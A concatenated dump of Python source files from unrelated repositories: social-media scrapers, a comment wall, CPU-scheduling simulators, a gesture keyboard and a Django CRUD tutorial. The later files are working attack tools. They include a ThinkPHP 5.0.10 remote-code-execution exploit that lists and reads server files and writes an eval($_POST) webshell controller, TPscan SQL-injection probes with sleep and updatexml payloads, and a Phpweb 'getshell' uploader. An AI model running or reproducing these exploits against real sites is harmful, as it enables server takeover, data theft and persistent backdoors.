class ElasticsearchAdapter:
def __init__(self):
self.es = Elasticsearch()
def insert_doc(self, index, elastic_id, source, content):
doc = {
ElasticsearchDocVO.TIMESTAMP: datetime.now(),
ElasticsearchDocVO.UPDATED_AT: datetime.now(),
ElasticsearchDocVO.SOURCE: source,
ElasticsearchDocVO.CONTENT: content,
ElasticsearchDocVO.TOPICS: [],
ElasticsearchDocVO.SENTIMENT: SentimentType.UNK.value
}
return self.es.create(
index=index,
id=elastic_id,
body=doc
)
|
Xepp/magpie
|
manage.py
|
import os
from dotenv import load_dotenv
from argparse import ArgumentParser
from app.util.enumeration import SourceType
from app.process.twitter_stream_process import TwitterStreamProcess
from app.process.instagram_comment_process import InstagramCommentProcess
from app.process.web_comment_process import KhabarFooriCommentProcess
def run_web_comment(args):
url = args.url
process = KhabarFooriCommentProcess()
process.run(url)
def run_twitter_stream(args):
twitter_consumer_key = os.getenv('TWITTER_CONSUMER_KEY')
twitter_consumer_secret = os.getenv('TWITTER_CONSUMER_SECRET')
twitter_access_token = os.getenv('TWITTER_ACCESS_TOKEN')
twitter_access_token_secret = os.getenv('TWITTER_ACCESS_TOKEN_SECRET')
process = TwitterStreamProcess(
consumer_key=twitter_consumer_key,
consumer_secret=twitter_consumer_secret,
access_token=twitter_access_token,
access_token_secret=twitter_access_token_secret
)
process.run()
def run_instagram_comment(args):
shortcode = args.shortcode
process = InstagramCommentProcess()
process.run(shortcode)
if __name__ == '__main__':
load_dotenv()
parser = ArgumentParser()
subparsers = parser.add_subparsers(dest='source')
parser_twitter = subparsers.add_parser('twitter')
parser_twitter.set_defaults(func=run_twitter_stream)
parser_instagram = subparsers.add_parser('instagram')
parser_instagram.add_argument(
'-s',
'--shortcode',
required=True,
help='instagram media shortcode'
)
parser_instagram.set_defaults(func=run_instagram_comment)
parser_web = subparsers.add_parser('web')
parser_web.add_argument(
'-u',
'--url',
required=True,
help='web (Khabar Foori) url'
)
parser_web.set_defaults(func=run_web_comment)
args = parser.parse_args()
args.func(args)
|
Xepp/magpie
|
app/adapter/instagram.py
|
<reponame>Xepp/magpie<gh_stars>0
import hashlib
import string
import random
from instagram_web_api import Client
class InstagramWebClient(Client):
@staticmethod
def _extract_rhx_gis(html):
options = string.ascii_lowercase + string.digits
text = ''.join([random.choice(options) for _ in range(8)])
return hashlib.md5(text.encode()).hexdigest()
class InstagramWebAdapter:
def __init__(self):
self.api = InstagramWebClient(
auto_patch=False,
drop_incompat_keys=False
)
def get_media_comments(self, shortcode, end_cursor=None, count=50):
items = list()
feed = self.api.media_comments(
short_code=shortcode,
end_cursor=end_cursor,
count=count,
extract=False
)
if not feed.get('status') == 'ok':
raise Exception('status not ok')
result = feed.get('data', {}).get('shortcode_media', {}).get('edge_media_to_comment', {})
new_end_cursor = result.get('page_info', {}).get('end_cursor')
has_next_page = result.get('page_info', {}).get('has_next_page', False)
edges = result.get('edges', [])
edges = [edge.get('node') for edge in edges]
items.extend(reversed(edges))
return items, new_end_cursor, has_next_page
|
Xepp/magpie
|
app/process/twitter_stream_process.py
|
from tweepy import OAuthHandler
from tweepy import Stream
from app.adapter.twitter import TwitterStreamListener
class TwitterStreamProcess:
def __init__(self, consumer_key, consumer_secret, access_token, access_token_secret):
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
self.access_token = access_token
self.access_token_secret = access_token_secret
def _get_oauth_handler(self):
auth = OAuthHandler(
consumer_key=self.consumer_key,
consumer_secret=self.consumer_secret
)
auth.set_access_token(
key=self.access_token,
secret=self.access_token_secret
)
return auth
@staticmethod
def _get_track_list():
_track = [
'از',
'به',
'با',
'چرا',
'که',
'هم',
'یه',
'این',
'تو'
]
return _track or None
@staticmethod
def _get_language_list():
_languages = [
'fa'
]
return _languages or None
def run(self):
stream_listener = TwitterStreamListener()
auth = self._get_oauth_handler()
stream = Stream(
auth=auth,
listener=stream_listener,
tweet_mode='extended'
)
track = self._get_track_list()
languages = self._get_language_list()
stream.filter(
track=track,
languages=languages
)
|
mc3273/allow-comments-on-your-page
|
notes.py
|
<gh_stars>0
# Import Librarys
import urllib
import os
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.datastore.datastore_query import Cursor
import webapp2
import jinja2
template_dir = os.path.join(os.path.dirname(__file__), 'templates')
jinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir), autoescape=True)
# Defines the HTML Templates
class Handler(webapp2.RequestHandler):
def render(self, template, **kw):
self.write(self.render_str(template,**kw))
def render_str(self, template, **params):
template = jinja_env.get_template(template)
return template.render(params)
def write(self, *a, **kw):
self.response.write(*a, **kw)
# Comments Wall
DEFAULT_WALL = 'Comments'
def wall_key(wall_name=DEFAULT_WALL):
return ndb.Key('Wall', wall_name)
# Post Variables
class Author(ndb.Model):
identity = ndb.StringProperty(indexed=True)
name = ndb.StringProperty(indexed=False)
email = ndb.StringProperty(indexed=False)
class Post(ndb.Model):
author = ndb.StructuredProperty(Author)
content = ndb.StringProperty(indexed=False)
date = ndb.DateTimeProperty(auto_now_add=True)
# Define Main Page
class MainPage(Handler):
def get(self):
wall_name = self.request.get('wall_name',DEFAULT_WALL)
if wall_name == DEFAULT_WALL.lower(): wall_name = DEFAULT_WALL
posts_to_fetch = 10
cursor_url = self.request.get('continue_posts')
arguments = {'wall_name': wall_name}
posts_query = Post.query(ancestor = wall_key(wall_name)).order(-Post.date)
posts, cursor, more = posts_query.fetch_page(posts_to_fetch, start_cursor =
Cursor(urlsafe=cursor_url))
if more:
arguments['continue_posts'] = cursor.urlsafe()
arguments['posts'] = posts
user = 'Anonymous'
arguments['user_name'] = user
self.render('posts.html', **arguments)
# Define Post your Comment
class PostWall(webapp2.RequestHandler):
def post(self):
wall_name = self.request.get('wall_name',DEFAULT_WALL)
post = Post(parent=wall_key(wall_name))
content = self.request.get('content')
if type(content) != unicode:
post.content = unicode(self.request.get('content'),'utf-8')
else:
post.content = self.request.get('content')
post.put()
query_params = {'wall_name': wall_name}
self.redirect('/?' + urllib.urlencode(query_params))
app = webapp2.WSGIApplication([
('/', MainPage),
('/sign', PostWall),
], debug=True)
|
userElaina/oslab
|
cui1.py
|
import os
import random
rd=lambda x:(random.choice(list(range(100)))<x)
s_time=[2,4,8,16,999999]
_q=[list(),]*len(s_time)
NT='NEXIST'
RD='READY'
RUN='RUNNING'
IO='WAITING'
END='DONE'
BG='begin'
_process_example={
'name':'EXIT',
'id':0,
'total':0,
'wait':0,
'err':0,
'+io':0,
'-io':50,
'surplus':0,
'state':END,
}
def process_maker()->list:
_process=list()
for i in range(5):
_a={
'name':'p'+str(i+1),
'id':100+i+1,
'total':20,
'+io':40,
'-io':10,
}
_process.append(_a)
for i in range(5,10):
_a={
'name':'p'+str(i+1),
'id':200+i+1,
'total':10,
'wait':(i+1)*10,
}
_process.append(_a)
for i in range(10,15):
_a={
'name':'p'+str(i+1),
'id':300+i+1,
'total':40,
'err':3,
}
_process.append(_a)
return _process
def u(js:dict,k:str,v:all,t:type=int)->None:
if k not in js:
js[k]=v
js[k]=t(js[k])
_l=process_maker()
for i in _l:
i['state']=NT
u(i,'surplus',i['total'])
u(i,'total',20)
u(i,'wait',0)
u(i,'err',0)
u(i,'+io',0)
u(i,'-io',50)
if i['wait']:
continue
i['state']=0
_q[0].append(i)
def chose():
for i in _q:
if i:
return i.pop(0)
def fil(l:list,x:int=8)->str:
return ''.join([str(i)+' '*(x-len(str(i))) for i in l])
def bg()->None:
l=['Clock','Queue','CPU','NewIO?']+[i['name'] for i in _l]
print(fil(l))
def ckio(p:dict):
for i in _l:
if i==p:
continue
if i['state']==IO:
if rd(i['-io']):
i['state']=0
# print('push',i)
_q[0].append(i)
_clk=1
def clk(p:dict=None,lv:int=0):
global _clk
if p:
if rd(p['+io']):
p['state']=IO
if p['surplus']==1 or rd(p['err']):
p['state']=END
l=[_clk,lv,p['name']+'_'+str(p['total']-p['surplus']+1),'True' if p['state']==IO else '']+[RUN if i==p else (RD if isinstance(i['state'],int) else i['state']) for i in _l]
else:
p=_process_example
l=[_clk,'','WAITING','']+[RD if isinstance(i['state'],int) else i['state'] for i in _l]
print(fil(l))
ckio(p)
for i in _l:
if i['wait']==_clk:
i['state']=0
_q[0].append(i)
p['surplus']-=1
_clk+=1
def run():
if not [None for i in _l if i['state']!=END]:
return
p=chose()
if not p:
clk()
return True
lv=p['state']
# print('pop',p)
for i in range(s_time[lv]):
if not isinstance(p['state'],int):
break
clk(p,lv)
if isinstance(p['state'],int):
p['state']+=1
# print('push',p)
_q[p['state']].append(p)
return True
bg()
while run():None
clk()
clk()
clk()
|
userElaina/oslab
|
gui3.py
|
<reponame>userElaina/oslab
import os
import random
import tkinter as tk
from time import sleep as slp
from copy import deepcopy as dcp
import downs
_lg='out1.csv'
rd=lambda x:(random.choice(list(range(100)))<abs(x))
open(_lg,'wb')
_other_1=False
_other_2=False
_other_3=False
_other_4=False
_other_5=True
_other_6=False
if _other_2:
_key=lambda i:i['total']
if _other_3:
_key=lambda i:i['remain']
if _other_4:
_key=lambda i:1+(_clk-i['wait']+1)/i['total']
if _other_5:
_key=lambda i:i['other']
def pt(x:str):
print(x)
open(_lg,'a').write(str(x)+'\n')
def u(js:dict,k:str,v:all,t:type=int)->None:
if k not in js:
js[k]=v
js[k]=t(js[k])
def Fbt(
where,
px:int,
py:int,
x:int,
y:int,
command=None,
text:str='',
font:tuple=('黑体',12,),
bg:str='#ffffff',
abg:str=None,
bd=0,
):
if not abg:
abg=bg
fa=tk.Frame(
where,
width=px,
height=py,
bg=bg,
)
fa.propagate(False)
fa.place(x=x,y=y)
a=tk.Button(
fa,
command=command,
text=text,
font=font,
bg=bg,
bd=bd,
activebackground=abg,
)
a.pack(expand=True,fill=tk.BOTH)
return a
NT='NEXIST'
RD='READY'
RUN='RUNNING'
IO='WAITING'
END='DONE'
BG='background'
col={
BG:'#ffffff',
NT:'#ffffff',
RD:'#00ff00',
RUN:'#00ffff',
IO:'#ff0000',
END:'#7f7f7f',
}
_process_example={
'name':'EXIT',
'id':0,
'total':0,
'wait':0,
'err':0,
'other':0,
'+io':0,
'-io':50,
'remain':0,
'state':END,
}
def process_maker()->list:
_process=list()
for i in range(5):
_a={
'name':'p'+str(i+1),
'id':100+i+1,
'total':20,
'+io':40,
'-io':10,
}
_process.append(_a)
for i in range(5,10):
_a={
'name':'p'+str(i+1),
'id':200+i+1,
'total':10,
'wait':(i+1)*10,
}
_process.append(_a)
for i in range(10,15):
_a={
'name':'p'+str(i+1),
'id':300+i+1,
'total':40,
'err':3,
}
_process.append(_a)
return _process
_l=process_maker()
s_time=[2,4,8,16,99]
if _other_1 or _other_2 or _other_3 or _other_4 or _other_5:
s_time=[999999,999999,999999,999999,999999]
if _other_6:
s_time=[4,4,4,4,4,]
_q=[list() for i in s_time]
_len=len(_l)
dpix,dpiy=1440,900
psquare=50
pd=2
ptitle=25
_len_title=[100,150,150,150,160,200,100]
nx=(dpix-psquare*2)//(psquare+pd)
ny=(_len-1)//nx+1
t=tk.Tk()
t.geometry(str(dpix)+'x'+str(dpiy)+'+0+0')
if _other_1:
t.title('First Come First Serve')
elif _other_2:
t.title('Shortest Job First')
elif _other_3:
t.title('Shortest Remaining Time Next')
elif _other_4:
t.title('Highest Response Ratio Next')
elif _other_5:
t.title('Highest Possible Frequency')
elif _other_6:
t.title('Round Robin')
else:
t.title('Feed-Back')
# t.iconbitmap('1.png')
tt=tk.Frame(
t,
width=dpix,
height=dpiy,
bg=col[BG],
)
tt.place(x=0,y=0)
# tt.pack(expand=True,fill=tk.BOTH)
fbts=list()
bts=list()
bt_clk=None
bt_auto=None
bt_cpu=None
nwx,nwy=pd,pd
a=Fbt(
tt,
px=_len_title[0],
py=ptitle,
x=pd,
y=pd,
text='所有进程:',
bg=col[BG],
)
nwy+=ptitle+pd
for j in range(ny):
yy=nwy+(psquare+pd)*j
for i in range(nx):
n=j*nx+i
xx=nwx+(psquare+pd)*i
a=Fbt(
tt,
px=psquare,
py=psquare,
x=xx,
y=yy,
text=(_l[n]['name']+'\n'+str(_l[n]['total'])+'/'+str(_l[n]['total'])) if n<_len else '',
bg=col[NT] if n<_len else col[BG],
)
bts.append(a)
for k in range(len(s_time)+1):
nwx,nwy=pd,pd+(ptitle+pd+psquare+ptitle)*(k+1)
a=Fbt(
tt,
px=_len_title[k+1],
py=ptitle,
x=nwx,
y=nwy,
text=('等待队列:')
if k==len(s_time) else
('进程队列'+str(k+1)+':'),
bg=col[BG],
)
nwy+=ptitle+pd
for j in range(ny):
yy=nwy+(psquare+pd)*j
for i in range(nx):
xx=nwx+(psquare+pd)*i
a=Fbt(
tt,
px=psquare,
py=psquare,
x=xx,
y=yy,
text='',
bg=col[BG],
)
bts.append(a)
flg_wait=True
def f():
global flg_wait
flg_wait=False
def run():
if not [None for i in _l if i['state']!=END]:
clk()
return False
p=chose()
if not p:
clk()
return True
lv=p['state']
flg_ct=False
for i in range(s_time[lv]):
if not clk(p,lv):
flg_ct=True
break
if isinstance(p['state'],int):
if not flg_ct and not _other_6:
p['state']+=1
_q[p['state']].append(p)
return True
def th_1():
while True:
run()
flg_auto=False
def th_2():
while True:
slp(0.01)
if flg_auto:
f()
def h():
global flg_auto
if flg_auto:
bt_auto['bg']=col[IO]
bt_auto['activebackground']=col[RUN]
else:
bt_auto['bg']=col[RUN]
bt_auto['activebackground']=col[IO]
flg_auto=~flg_auto
def bg():
l=['Clock','Queue','CPU','NewIO?']+[i['name'] for i in _l]
pt(fil(l))
for _i in range(_len):
i=_l[_i]
i['state']=NT
u(i,'remain',i['total'])
u(i,'total',20)
u(i,'wait',0)
u(i,'err',0)
u(i,'other',0)
u(i,'+io',0)
u(i,'-io',50)
if i['wait']!=0:
continue
i['state']=0
bts[_i]['bg']=col[RD if isinstance(i['state'],int) else i['state']]
bts[_i]['activebackground']=bts[_i]['bg']
bts[_i+nx]['bg']=bts[_i]['bg']
bts[_i+nx]['activebackground']=bts[_i]['bg']
bts[_i+nx]['text']=i['name']
_q[0].append(i)
downs.throws(th_1)
downs.throws(th_2)
bt_clk['text']='Clock'
bt_clk['command']=f
bt_auto['command']=h
bt_auto['text']='Auto'
bt_auto['bg']=col[IO]
bt_auto['activebackground']=col[RD]
def chose():
for i in _q:
if i:
return i.pop(0)
def fil(l:list,x:int=8)->str:
return ','.join([str(i)+' '*(x-1-len(str(i))) for i in l])
def ckio(p:dict):
_ans=list()
for i in _l:
if i==p:
continue
if i['state']==IO:
if rd(i['-io']):
i['state']=0
_q[0].append(i)
_ans.append(i['name'])
return _ans
_clk=1
def clk(p:dict=None,lv:int=0):
global _clk,flg_wait
while flg_wait:None
# print(clk)
if p:
if rd(p['+io']):
p['state']=IO
if p['remain']==1 or rd(p['err']):
p['state']=END
l=[
_clk,
lv,
p['name']+'_'+str(p['total']-p['remain']+1),
'True' if p['state']==IO else ''
]+[
RUN if i==p else (
RD if isinstance(i['state'],int) else i['state']
) for i in _l
]
bt_cpu['text']=p['name']
bt_cpu['bg']=col[RUN]
bt_cpu['activebackground']=col[RUN]
else:
p=_process_example
l=[_clk,'','WAITING','']+[
RD if isinstance(i['state'],int) else i['state']
for i in _l
]
bt_cpu['text']='WAIT\nING'
bt_cpu['bg']=col[END]
bt_cpu['activebackground']=col[END]
pt(fil(l))
for _i in range(_len):
i=_l[_i]
bts[_i]['bg']=col[RUN if i==p else (
RD if isinstance(i['state'],int) else i['state']
)]
bts[_i]['activebackground']=bts[_i]['bg']
bts[_i]['text']=i['name']+'\n'+str(i['remain'])+'/'+str(i['total'])
for _i in range(len(_q)):
i=_q[_i]
for _j in range(nx):
_k=(_i+1)*nx+_j
if _j<len(i):
bts[_k]['text']=i[_j]['name']
bts[_k]['bg']=col[RD]
bts[_k]['activebackground']=col[RD]
else:
bts[_k]['text']=''
bts[_k]['bg']=col[BG]
bts[_k]['activebackground']=col[BG]
_waits=ckio(p)
for i in _l:
if i['state']!=NT:
continue
if i['wait']==_clk or (i['wait']<0 and rd(i['wait'])):
i['state']=0
_q[0].append(i)
if _other_2 or _other_3 or _other_4 or _other_5:
for i in _q:
i.sort(key=_key)
for _j in range(nx):
_k=(len(s_time)+1)*nx+_j
if _j<len(_waits):
bts[_k]['text']=_waits[_j]
bts[_k]['bg']=col[IO]
bts[_k]['activebackground']=col[IO]
else:
bts[_k]['text']=''
bts[_k]['bg']=col[BG]
bts[_k]['activebackground']=col[BG]
bt_tm['text']=str(_clk)
p['remain']-=1
flg_wait=True
_clk+=1
if not isinstance(p['state'],int):
return False
for i in range(p['state']):
if _q[i]:
return False
return True
bt_clk=Fbt(
tt,
px=psquare,
py=psquare,
x=dpix-int(psquare*1.5),
y=psquare,
text='Begin',
bg=col[IO],
abg=col[RUN],
command=bg,
font=('黑体',12,''),
)
bt_auto=Fbt(
tt,
px=psquare,
py=psquare,
x=dpix-int(psquare*1.5),
y=int(psquare*2.5),
text='',
bg=col[BG],
abg=col[BG],
)
Fbt(
tt,
px=psquare,
py=psquare//2,
x=dpix-int(psquare*1.5),
y=psquare*5,
text='CPU',
bg=col[BG],
abg=col[BG],
)
bt_cpu=Fbt(
tt,
px=psquare,
py=psquare,
x=dpix-int(psquare*1.5),
y=pd+int(psquare*5.5),
text='WAIT\nING',
bg=col[END],
abg=col[END],
)
Fbt(
tt,
px=psquare,
py=psquare//2,
x=dpix-int(psquare*1.5),
y=psquare*7,
text='Clock',
bg=col[BG],
abg=col[BG],
)
bt_tm=Fbt(
tt,
px=psquare,
py=psquare,
x=dpix-int(psquare*1.5),
y=pd+int(psquare*7.5),
text='0',
bg=col[RUN],
abg=col[RUN],
)
t.mainloop()
|
RishabhKT/Virtual-Keyboard-Using-Open-CV
|
virtual key.py
|
import cv2
from cvzone.HandTrackingModule import HandDetector
from time import sleep
import numpy as np
import cvzone
from pynput.keyboard import Key,Controller
cap = cv2.VideoCapture(0)
cap.set(3, 1280)
cap.set(4, 720)
detector = HandDetector(detectionCon=0.8)
keys = [["Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P"],
["A", "S", "D", "F", "G", "H", "J", "K", "L", "space"],
["Z", "X", "C", "V", "B", "N", "M", ",", ".", "Del"]]
finalText = ""
keyboard = Controller()
def drawAll(img, buttonList):
for button in buttonList:
x, y = button.pos
w, h = button.size
cvzone.cornerRect(img, (button.pos[0], button.pos[1], button.size[0], button.size[1]),
20, rt=0)
cv2.rectangle(img, button.pos, (x + w, y + h), (255, 0, 255), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)
return img
#
# def drawAll(img, buttonList):
# imgNew = np.zeros_like(img, np.uint8)
# for button in buttonList:
# x, y = button.pos
# cvzone.cornerRect(imgNew, (button.pos[0], button.pos[1], button.size[0], button.size[1]),
# 20, rt=0)
# cv2.rectangle(imgNew, button.pos, (x + button.size[0], y + button.size[1]),
# (255, 0, 255), cv2.FILLED)
# cv2.putText(imgNew, button.text, (x + 40, y + 60),
# cv2.FONT_HERSHEY_PLAIN, 2, (255, 255, 255), 3)
#
# out = img.copy()
# alpha = 0.5
# mask = imgNew.astype(bool)
# print(mask.shape)
# out[mask] = cv2.addWeighted(img, alpha, imgNew, 1 - alpha, 0)[mask]
# return out
class Button():
def __init__(self, pos, text, size=[85, 85]):
self.pos = pos
self.size = size
self.text = text
buttonList = []
for i in range(len(keys)):
for j, key in enumerate(keys[i]):
buttonList.append(Button([100 * j + 50, 100 * i + 50], key))
while True:
success, img = cap.read()
img = detector.findHands(img)
lmList, bboxInfo = detector.findPosition(img)
img = drawAll(img, buttonList)
if lmList:
for button in buttonList:
x, y = button.pos
w, h = button.size
if x < lmList[8][0] < x + w and y < lmList[8][1] < y + h:
cv2.rectangle(img, (x - 5, y - 5), (x + w + 5, y + h + 5), (175, 0, 175), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)
l, _, _ = detector.findDistance(8, 12, img, draw=False)
print(l)
## when clicked
if l < 35:
if button.text=="Del":
keyboard.press(Key.backspace)
cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 3, (255, 255, 255), 4)
finalText = finalText[:-1]
elif button.text=='space':
keyboard.press(Key.space)
cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 3, (255, 255, 255), 4)
finalText +=" "
else:
keyboard.press(button.text)
cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)
finalText += button.text
sleep(0.5)
cv2.rectangle(img, (50, 350), (700, 450), (175, 0, 175), cv2.FILLED)
cv2.putText(img, finalText, (60, 430),
cv2.FONT_HERSHEY_PLAIN, 5, (255, 255, 255), 5)
cv2.imshow("Image", img)
cv2.waitKey(1)
|
nitinprakash96/zeolearn-tut
|
crudapp/crudapp/views.py
|
<reponame>nitinprakash96/zeolearn-tut
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse
def home(request):
html = """
<h1>Django CRUD Example</h1>
<a href="/blog_posts/">Blog post CRUD example</a><br>
"""
return HttpResponse(html)
|
nitinprakash96/zeolearn-tut
|
crudapp/blog_posts/views.py
|
<gh_stars>0
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render, redirect, get_object_or_404
from django.forms import ModelForm
from blog_posts.models import blog_posts
# Create your views here.
class PostsForm(ModelForm):
class Meta:
model = blog_posts
fields = ['id', 'title', 'author']
def post_list(request, template_name='blog_posts/post_list.html'):
posts = blog_posts.objects.all()
data = {}
data['object_list'] = posts
return render(request, template_name, data)
def post_create(request, template_name='blog_posts/post_form.html'):
form = PostsForm(request.POST or None)
if form.is_valid():
form.save()
return redirect('blog_posts:post_list')
return render(request, template_name, {'form': form})
def post_update(request, pk, template_name='blog_posts/post_form.html'):
post = get_object_or_404(blog_posts, pk=pk)
form = PostsForm(request.POST or None, instance=post)
if form.is_valid():
form.save()
return redirect('blog_posts:post_list')
return render(request, template_name, {'form': form})
def post_delete(request, pk, template_name='blog_posts/post_delete.html'):
post = get_object_or_404(blog_posts, pk=pk)
if request.method=='POST':
post.delete()
return redirect('blog_posts:post_list')
return render(request, template_name, {'object': post})
|
nitinprakash96/zeolearn-tut
|
crudapp/blog_posts/urls.py
|
from django.conf.urls import url
from blog_posts import views
urlpatterns = [
url(r'^$', views.post_list, name='post_list'),
url(r'^new$', views.post_create, name='post_new'),
url(r'^edit/(?P<pk>\d+)$', views.post_update, name='post_edit'),
url(r'^delete/(?P<pk>\d+)$', views.post_delete, name='post_delete'),
]
|
nitinprakash96/zeolearn-tut
|
crudapp/crudapp/urls.py
|
<reponame>nitinprakash96/zeolearn-tut
"""crudapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
"""
from django.conf.urls import url, include
from django.contrib import admin
from crudapp.views import home
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^blog_posts/', include('blog_posts.urls', namespace='blog_posts')),
url(r'^$', home, name='home' ),
]
|
jun-test/super-guacamole
|
thinkphp5.0.1-automatic-getshell-master/tp_exp.py
|
<reponame>jun-test/super-guacamole<filename>thinkphp5.0.1-automatic-getshell-master/tp_exp.py
# -*- encoding: utf8 -*-
'''
Thinkphp 5.0.10 Exploit
by DKing
'''
import requests
import base64
import re
#_url = 'https://qaq.link/'
#_proxies = {}
#_headers = {}
#_auth = ('<PASSWORD>', '<PASSWORD>')
_url = 'http://wwww.xxxxxx.com'
_proxies = {'http': 'http://127.0.0.1:2081/', 'https': 'http://127.0.0.1:2081/'} # 改代理
_headers = {'Cookie': 'PHPSESSID=fbg7079bj6968cts9ulc597703',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'}
_auth = None
def send_payload(data):
try:
r=requests.post(_url, data=data, proxies=_proxies, headers=_headers, timeout=5, auth=_auth)
except:
print('超时,请重试')
return False
if 'Cannot call assert() with string argument dynamically' in r.text:
print('PHP版本过高')
return False
before_exception = r.text.split('<div class="exception">')
if len(before_exception) == 1:
return False
after_echo = before_exception[0].split('<div class="echo">')
if len(after_echo) == 1:
return False
result = after_echo[1].split('</div>')[0][11:-4]
if not result:
print('返回内容为空')
return True
return result
def run_php_script(script):
payload = {
's': script,
'_method': '__construct',
'filter': 'assert'
}
return send_payload(payload)
def list_dir(path):
script = 'var_dump(scandir("' + path.replace('"', '\\"') + '"))'
var_dumps = run_php_script(script)
if var_dumps and var_dumps is not True:
return re.findall(r'\s+string\(\d+\)\s\"(.+)\"', var_dumps)
def write_file(filename, content):
encoded_content = str(base64.b64encode(content.encode('utf-8')),'utf-8')
script = 'file_put_contents("%s", base64_decode("%s"))' % (filename.replace('"', '\\"'), encoded_content)
return run_php_script(script)
def dump_file(path, method=1):
if method == 1:
script = 'include("%s")' % (path.replace('"', '\\"'))
return run_php_script(script)
else:
payload2 = {
'_method': '__construct',
'method': 'get',
'filter[]': 'think\\__include_file',
'get[]': path,
'server[]': 'phpinfo',
}
return send_payload(payload2)
def delete_file(filename):
script = 'unlink("%s")' % filename
return run_php_script(script)
def write_shell(module_name='index', shell_name='Indexa', key='cmd'):
# 创建控制器
filename = '../application/%s/controller/%s.php' % (module_name, shell_name)
content = '''<?php
namespace app\%s\controller;
class %s
{
public function index()
{
eval($_POST['%s']);
}
}
''' % (module_name, shell_name, key)
write_file(filename, content)
folder = '../application/%s/controller/' % (module_name)
current_files = list_dir(folder)
if current_files and (shell_name + '.php' in current_files):
print('Write OK')
print(dump_file(filename))
else:
print('Failed to write shell')
if __name__ == '__main__':
list_dir('.')
list_dir('../application')
dump_file('../application/.htaccess')
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_checkcode_time_sqli.py
|
<filename>TPscan/plugins/thinkphp_checkcode_time_sqli.py
#!/usr/bin/env python
# coding=utf-8
import time
import urllib
import requests
def thinkphp_checkcode_time_sqli_verify(url):
pocdict = {
"vulnname":"thinkphp_checkcode_time_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : "TPscan",
"DNT": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Content-Type": "multipart/form-data; boundary=--------641902708",
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "zh-CN,zh;q=0.8",
}
payload = "----------641902708\r\nContent-Disposition: form-data; name=\"couponid\"\r\n\r\n1')UniOn SelEct slEEp(8)#\r\n\r\n----------641902708--"
try:
start_time = time.time()
vurl = urllib.parse.urljoin(url, 'index.php?s=/home/user/checkcode/')
req = requests.post(vurl, data=payload, headers=headers, timeout=15, verify=False)
if time.time() - start_time >= 8:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = 'time sleep 8'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
Phpweb-Getshell-py/Main.py
|
<filename>Phpweb-Getshell-py/Main.py
# -*- coding: UTF-8 -*- #
import os
import requests
import hashlib
bdlj = os.getcwd()
headers = open(bdlj+"\headers.txt",'r')
headerss = headers.read()
print('\b')
ur = input("请输入目标网址:")
requrl = ur + '/base/post.php'
reqdata = {"act":"appcode"}
r = requests.post(requrl,data=reqdata)
cz=r.text[2:34]
print ('初值:' + cz)
cz=r.text[2:34]+"a"
m = hashlib.md5()
b = cz.encode(encoding='utf-8')
m.update(b)
zz = m.hexdigest()
print ('终值:' + zz)
infile = open(bdlj + "\datas.txt", "r",encoding='utf-8')
outfile = open(bdlj + "\datah.txt", "w",encoding='utf-8')
for line in infile:
outfile.write(line.replace('156as1f56safasfasfa', zz))
infile.close()
outfile.close()
datas = open(bdlj+"\datah.txt",'r')
datass = datas.read()
gs = requests.post(ur + '/base/appfile.php',data=datass,headers={'Content-Type':headerss})
gs.encoding = 'utf-8'
print (gs.text)
if {gs.text == "OK"}:
print ("Getshell成功! Shell:" + ur + "/effect/source/bg/mstir.php")
else:
print ("Getsehll失败!")
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_debug_index_ids_sqli.py
|
<reponame>jun-test/super-guacamole<filename>TPscan/plugins/thinkphp_debug_index_ids_sqli.py<gh_stars>1-10
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_debug_index_ids_sqli_verify(url):
pocdict = {
"vulnname":"thinkphp_debug_index_ids_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : "TPscan",
}
payload = 'index.php?ids[0,UpdAtexml(0,ConcAt(0xa,Md5(2333)),0)]=1'
try:
vurl = urllib.parse.urljoin(url, payload)
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
if r"56540676a129760" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_index_showid_rce.py
|
<filename>TPscan/plugins/thinkphp_index_showid_rce.py
#!/usr/bin/env python
# coding=utf-8
import urllib
import datetime
import requests
def thinkphp_index_showid_rce_verify(url):
pocdict = {
"vulnname":"thinkphp_index_showid_rce",
"isvul": False,
"vulnurl":"",
